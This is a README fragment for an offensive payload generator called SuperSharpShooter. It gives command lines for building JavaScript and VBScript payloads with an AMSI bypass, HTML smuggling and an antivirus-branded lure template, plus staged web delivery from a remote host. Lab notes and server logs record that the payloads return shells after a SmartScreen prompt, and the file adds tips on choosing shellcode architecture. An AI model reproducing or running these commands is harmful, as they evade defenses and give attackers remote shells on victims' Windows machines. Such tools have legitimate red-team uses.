yosh1s/SuperSharpShooter/Readme.md

     ./SuperSharpShooter.py --stageless --dotnetver 4 --rawscfile rawsc.bin --payload js --output test --amsi amsienable --smuggle --template mcafee

 	./SuperSharpShooter.py --stageless --dotnetver 4 --rawscfile rawsc.bin --payload vbs --output test --amsi amsienable --smuggle --template mcafee

+Technique notes:
+Test host:  Windows 10, no internet
+Initial load of smuggling page:
+192.168.1.86 - - [19/Jan/2022:23:37:54 -0800] "GET /test2.html HTTP/1.1" 200 57832 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"

+After clicking/running the smuggled payload directly from the browser (roughly 30 seconds later):
+192.168.1.86 - - [19/Jan/2022:23:21:12 -0800] "-" 408 0 "-" "-"

+After waiting between 3 mins and 10 mins based on testing:
+"SmartScreen can't be reached.
+Run anyways?".
+After clicking yes, the payload is downloaded, and a shell is returned

+... which is strange, because if you try to run the smuggled payload that's downloaded directly from the Downloads folder (outside of the browser), a shell is returned in a very reasonable amount of time.
+Suspecting isolated SmartScreen filter as adding a massive latency.

+### Staged with AMSI Bypass, web delivery, HTML Smuggling of the stager
+    ./SuperSharpShooter.py --dotnetver 4 --shellcode --payload js --output test --amsi amsienable --smuggle --template mcafee --delivery web --web http://192.168.1.99/test.pay --scfile /var/www/html/met64.sharp

+Technique notes:
+Test host Windows 10, no internet

+The initial load of the .html:
+192.168.1.86 - - [19/Jan/2022:23:20:20 -0800] "GET /test.html HTTP/1.1" 200 61396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+^^ 200 status code '200 61396 "-"'

+After about 30 seconds after clicking the .js file:
+192.168.1.86 - - [19/Jan/2022:23:21:12 -0800] "-" 408 0 "-" "-"
+^^ 408 status code '408 0 "-"'

+After anywhere between 2 mins and 10 mins (based on testing)  total from .js click/run, "SmartScreen can't be reached.
+Run anyways?".
+After clicking yes, the payload is downloaded, and a shell is returned:
+192.168.1.86 - - [19/Jan/2022:23:22:58 -0800] "GET /test.pay HTTP/1.1" 200 3373 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
+^^ 200 status code '"GET /test.pay HTTP/1.1" 200 3373 "-"'

+### Other notes:
+For .hta payloads, mshta.exe is a 32-bit process, so keep in mind your shellcode should be 32bit too in that case.
+Else, most likely prefer x64bit shellcode for all other scenarios in modern environments.

+Also, don't be afraid of the DotNet ver=4, that's fixed now by the way.

 Big ups MDSec!